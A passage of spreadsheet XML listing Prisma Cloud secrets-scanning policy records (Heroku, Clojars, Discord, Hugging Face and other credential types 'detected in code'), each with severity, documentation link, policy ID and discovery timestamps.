        </is>
      </c>
      <c r="J526" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K526" t="inlineStr">
        <is>
          <t>Heroku Platform Key detected in code</t>
        </is>
      </c>
      <c r="L526" t="inlineStr"/>
      <c r="M526" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N526" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O526" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P526" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q526" t="inlineStr"/>
      <c r="R526" t="inlineStr"/>
      <c r="S526" t="inlineStr"/>
      <c r="T526" t="b">
        <v>0</v>
      </c>
      <c r="U526" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V526" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W526" t="inlineStr">
        <is>
          <t>Heroku Platform Key</t>
        </is>
      </c>
      <c r="X526" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-48</t>
        </is>
      </c>
      <c r="Y526" t="inlineStr"/>
      <c r="Z526" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA526" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB526" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC526" t="inlineStr">
        <is>
          <t>CKV_SECRET_48</t>
        </is>
      </c>
      <c r="AD526" t="b">
        <v>1</v>
      </c>
      <c r="AE526" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF526" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>ab6c1821-7b25-43d6-9ff0-ba300479c1ac</t>
        </is>
      </c>
      <c r="AI526" t="inlineStr"/>
      <c r="AJ526" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK526" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" t="inlineStr"/>
      <c r="B527" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C527" s="2" t="inlineStr"/>
      <c r="D527" t="inlineStr"/>
      <c r="E527" t="inlineStr"/>
      <c r="F527" t="inlineStr"/>
      <c r="G527" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J527" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K527" t="inlineStr">
        <is>
          <t>Clojars Deploy Token detected in code</t>
        </is>
      </c>
      <c r="L527" t="inlineStr"/>
      <c r="M527" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N527" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O527" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P527" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q527" t="inlineStr"/>
      <c r="R527" t="inlineStr"/>
      <c r="S527" t="inlineStr"/>
      <c r="T527" t="b">
        <v>0</v>
      </c>
      <c r="U527" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V527" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W527" t="inlineStr">
        <is>
          <t>Clojars Deploy Token</t>
        </is>
      </c>
      <c r="X527" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-106</t>
        </is>
      </c>
      <c r="Y527" t="inlineStr"/>
      <c r="Z527" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA527" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB527" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC527" t="inlineStr">
        <is>
          <t>CKV_SECRET_106</t>
        </is>
      </c>
      <c r="AD527" t="b">
        <v>1</v>
      </c>
      <c r="AE527" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF527" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>c281482c-dc41-4e02-9d7c-7316d248c897</t>
        </is>
      </c>
      <c r="AI527" t="inlineStr"/>
      <c r="AJ527" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK527" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" t="inlineStr"/>
      <c r="B528" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C528" s="2" t="inlineStr"/>
      <c r="D528" t="inlineStr"/>
      <c r="E528" t="inlineStr"/>
      <c r="F528" t="inlineStr"/>
      <c r="G528" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J528" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K528" t="inlineStr">
        <is>
          <t>Intercom Access Token detected in code</t>
        </is>
      </c>
      <c r="L528" t="inlineStr"/>
      <c r="M528" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N528" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O528" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P528" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q528" t="inlineStr"/>
      <c r="R528" t="inlineStr"/>
      <c r="S528" t="inlineStr"/>
      <c r="T528" t="b">
        <v>0</v>
      </c>
      <c r="U528" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V528" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W528" t="inlineStr">
        <is>
          <t>Intercom Access Token</t>
        </is>
      </c>
      <c r="X528" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-50</t>
        </is>
      </c>
      <c r="Y528" t="inlineStr"/>
      <c r="Z528" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA528" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB528" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC528" t="inlineStr">
        <is>
          <t>CKV_SECRET_50</t>
        </is>
      </c>
      <c r="AD528" t="b">
        <v>1</v>
      </c>
      <c r="AE528" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF528" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>1abf6697-5737-4067-8cbc-c060ca8cf331</t>
        </is>
      </c>
      <c r="AI528" t="inlineStr"/>
      <c r="AJ528" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK528" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" t="inlineStr"/>
      <c r="B529" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C529" s="2" t="inlineStr"/>
      <c r="D529" t="inlineStr"/>
      <c r="E529" t="inlineStr"/>
      <c r="F529" t="inlineStr"/>
      <c r="G529" t="b">
        <v>1</v>
      </c>
      <c r="H5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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J529" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K529" t="inlineStr">
        <is>
          <t>Coinbase Key detected in code</t>
        </is>
      </c>
      <c r="L529" t="inlineStr"/>
      <c r="M529" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N529" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O529" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P529" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q529" t="inlineStr"/>
      <c r="R529" t="inlineStr"/>
      <c r="S529" t="inlineStr"/>
      <c r="T529" t="b">
        <v>0</v>
      </c>
      <c r="U529" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V529" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W529" t="inlineStr">
        <is>
          <t>Coinbase Keys</t>
        </is>
      </c>
      <c r="X529" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-31</t>
        </is>
      </c>
      <c r="Y529" t="inlineStr"/>
      <c r="Z529" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA529" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB529" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC529" t="inlineStr">
        <is>
          <t>CKV_SECRET_31</t>
        </is>
      </c>
      <c r="AD529" t="b">
        <v>1</v>
      </c>
      <c r="AE529" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF529" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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29" t="inlineStr">
        <is>
          <t>d54bf289-817a-41bc-8f31-3502ab3db364</t>
        </is>
      </c>
      <c r="AI529" t="inlineStr"/>
      <c r="AJ529" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK529" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" t="inlineStr"/>
      <c r="B530" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C530" s="2" t="inlineStr"/>
      <c r="D530" t="inlineStr"/>
      <c r="E530" t="inlineStr"/>
      <c r="F530" t="inlineStr"/>
      <c r="G530" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J530" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K530" t="inlineStr">
        <is>
          <t>Private Key detected in code</t>
        </is>
      </c>
      <c r="L530" t="inlineStr"/>
      <c r="M530" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N530" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O530" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P530" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q530" t="inlineStr"/>
      <c r="R530" t="inlineStr"/>
      <c r="S530" t="inlineStr"/>
      <c r="T530" t="b">
        <v>0</v>
      </c>
      <c r="U530" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V530" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W530" t="inlineStr">
        <is>
          <t>Private Key</t>
        </is>
      </c>
      <c r="X530" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-13</t>
        </is>
      </c>
      <c r="Y530" t="inlineStr"/>
      <c r="Z530" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA530" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB530" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC530" t="inlineStr">
        <is>
          <t>CKV_SECRET_13</t>
        </is>
      </c>
      <c r="AD530" t="b">
        <v>1</v>
      </c>
      <c r="AE530" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF530" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>f9c21f44-a326-4f6d-8984-d2a8cffbd0bd</t>
        </is>
      </c>
      <c r="AI530" t="inlineStr"/>
      <c r="AJ530" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK530" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" t="inlineStr"/>
      <c r="B531" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C531" s="2" t="inlineStr"/>
      <c r="D531" t="inlineStr"/>
      <c r="E531" t="inlineStr"/>
      <c r="F531" t="inlineStr"/>
      <c r="G531" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J531" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K531" t="inlineStr">
        <is>
          <t>Readme API Key detected in code</t>
        </is>
      </c>
      <c r="L531" t="inlineStr"/>
      <c r="M531" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N531" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O531" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P531" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q531" t="inlineStr"/>
      <c r="R531" t="inlineStr"/>
      <c r="S531" t="inlineStr"/>
      <c r="T531" t="b">
        <v>0</v>
      </c>
      <c r="U531" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V531" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W531" t="inlineStr">
        <is>
          <t>Readme API Key</t>
        </is>
      </c>
      <c r="X531" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-63</t>
        </is>
      </c>
      <c r="Y531" t="inlineStr"/>
      <c r="Z531" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA531" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB531" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC531" t="inlineStr">
        <is>
          <t>CKV_SECRET_63</t>
        </is>
      </c>
      <c r="AD531" t="b">
        <v>1</v>
      </c>
      <c r="AE531" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF531" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>be223514-2ba7-4937-80d8-2bc725d201c1</t>
        </is>
      </c>
      <c r="AI531" t="inlineStr"/>
      <c r="AJ531" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK531" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" t="inlineStr"/>
      <c r="B532" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C532" s="2" t="inlineStr"/>
      <c r="D532" t="inlineStr"/>
      <c r="E532" t="inlineStr"/>
      <c r="F532" t="inlineStr"/>
      <c r="G532" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J532" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K532" t="inlineStr">
        <is>
          <t>Bitbucket Key detected in code</t>
        </is>
      </c>
      <c r="L532" t="inlineStr"/>
      <c r="M532" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N532" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O532" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P532" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q532" t="inlineStr"/>
      <c r="R532" t="inlineStr"/>
      <c r="S532" t="inlineStr"/>
      <c r="T532" t="b">
        <v>0</v>
      </c>
      <c r="U532" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V532" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W532" t="inlineStr">
        <is>
          <t>Bitbucket Keys</t>
        </is>
      </c>
      <c r="X532" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-27</t>
        </is>
      </c>
      <c r="Y532" t="inlineStr"/>
      <c r="Z532" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA532" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB532" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC532" t="inlineStr">
        <is>
          <t>CKV_SECRET_27</t>
        </is>
      </c>
      <c r="AD532" t="b">
        <v>1</v>
      </c>
      <c r="AE532" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF532" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>afcada96-ce49-4e3a-b05a-c72da1b68083</t>
        </is>
      </c>
      <c r="AI532" t="inlineStr"/>
      <c r="AJ532" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK532" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" t="inlineStr"/>
      <c r="B533" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C533" s="2" t="inlineStr"/>
      <c r="D533" t="inlineStr"/>
      <c r="E533" t="inlineStr"/>
      <c r="F533" t="inlineStr"/>
      <c r="G533" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J533" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K533" t="inlineStr">
        <is>
          <t>Airtable API Key detected in code</t>
        </is>
      </c>
      <c r="L533" t="inlineStr"/>
      <c r="M533" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N533" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O533" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P533" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q533" t="inlineStr"/>
      <c r="R533" t="inlineStr"/>
      <c r="S533" t="inlineStr"/>
      <c r="T533" t="b">
        <v>0</v>
      </c>
      <c r="U533" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V533" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W533" t="inlineStr">
        <is>
          <t>Airtable API Key</t>
        </is>
      </c>
      <c r="X533" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-21</t>
        </is>
      </c>
      <c r="Y533" t="inlineStr"/>
      <c r="Z533" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA533" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB533" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC533" t="inlineStr">
        <is>
          <t>CKV_SECRET_21</t>
        </is>
      </c>
      <c r="AD533" t="b">
        <v>1</v>
      </c>
      <c r="AE533" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF533" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>8058279d-25be-4115-bd84-6b830faa3c5d</t>
        </is>
      </c>
      <c r="AI533" t="inlineStr"/>
      <c r="AJ533" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK533" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" t="inlineStr"/>
      <c r="B534" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C534" s="2" t="inlineStr"/>
      <c r="D534" t="inlineStr"/>
      <c r="E534" t="inlineStr"/>
      <c r="F534" t="inlineStr"/>
      <c r="G534" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J534" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K534" t="inlineStr">
        <is>
          <t>Discord Token detected in code</t>
        </is>
      </c>
      <c r="L534" t="inlineStr"/>
      <c r="M534" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N534" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O534" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P534" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q534" t="inlineStr"/>
      <c r="R534" t="inlineStr"/>
      <c r="S534" t="inlineStr"/>
      <c r="T534" t="b">
        <v>0</v>
      </c>
      <c r="U534" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V534" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W534" t="inlineStr">
        <is>
          <t>Discord Token</t>
        </is>
      </c>
      <c r="X534" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-35</t>
        </is>
      </c>
      <c r="Y534" t="inlineStr"/>
      <c r="Z534" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA534" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB534" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC534" t="inlineStr">
        <is>
          <t>CKV_SECRET_35</t>
        </is>
      </c>
      <c r="AD534" t="b">
        <v>1</v>
      </c>
      <c r="AE534" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF534" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>b0e5f091-e7de-4d70-bbcf-3289a307c0eb</t>
        </is>
      </c>
      <c r="AI534" t="inlineStr"/>
      <c r="AJ534" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK534" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" t="inlineStr"/>
      <c r="B535" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C535" s="2" t="inlineStr"/>
      <c r="D535" t="inlineStr"/>
      <c r="E535" t="inlineStr"/>
      <c r="F535" t="inlineStr"/>
      <c r="G535" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J535" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K535" t="inlineStr">
        <is>
          <t>Hugging Face token detected in code</t>
        </is>
      </c>
      <c r="L535" t="inlineStr"/>
      <c r="M535" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N535" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O535" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P535" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q535" t="inlineStr"/>
      <c r="R535" t="inlineStr"/>
      <c r="S535" t="inlineStr"/>
      <c r="T535" t="b">
        <v>0</v>
      </c>
      <c r="U535" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V535" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W535" t="inlineStr">
        <is>
          <t>Hugging Face token</t>
        </is>
      </c>
      <c r="X535" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-110</t>
        </is>
      </c>
      <c r="Y535" t="inlineStr"/>
      <c r="Z535" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA535" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB535" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC535" t="inlineStr">
        <is>
          <t>CKV_SECRET_110</t>
        </is>
      </c>
      <c r="AD535" t="b">
        <v>1</v>
      </c>
      <c r="AE535" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF535" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>e2640769-77a0-4f91-af76-ff58e1a91dee</t>
        </is>
      </c>
      <c r="AI535" t="inlineStr"/>
      <c r="AJ535" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK535" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" t="inlineStr"/>
      <c r="B536" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C536" s="2" t="inlineStr"/>
      <c r="D536" t="inlineStr"/>
      <c r="E536" t="inlineStr"/>
      <c r="F536" t="inlineStr"/>
      <c r="G536" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J536" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K536" t="inlineStr">
        <is>
          <t>RapidAPI Key detected in code</t>
        </is>
      </c>
      <c r="L536" t="inlineStr"/>
      <c r="M536" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N536" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O536" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P536" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q536" t="inlineStr"/>
      <c r="R536" t="inlineStr"/>
      <c r="S536" t="inlineStr"/>
      <c r="T536" t="b">
        <v>0</v>
      </c>
      <c r="U536" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V536" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W536" t="inlineStr">
        <is>
          <t>RapidAPI Key</t>
        </is>
      </c>
      <c r="X536" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-62</t>
        </is>
      </c>
      <c r="Y536" t="inlineStr"/>
      <c r="Z536" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA536" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB536" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC536" t="inlineStr">
        <is>
          <t>CKV_SECRET_62</t>
        </is>
      </c>
      <c r="AD536" t="b">
        <v>1</v>
      </c>
      <c r="AE536" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF536" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>1f01777e-9839-47c3-bd90-e840a464b17b</t>
        </is>
      </c>
      <c r="AI536" t="inlineStr"/>
      <c r="AJ536" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
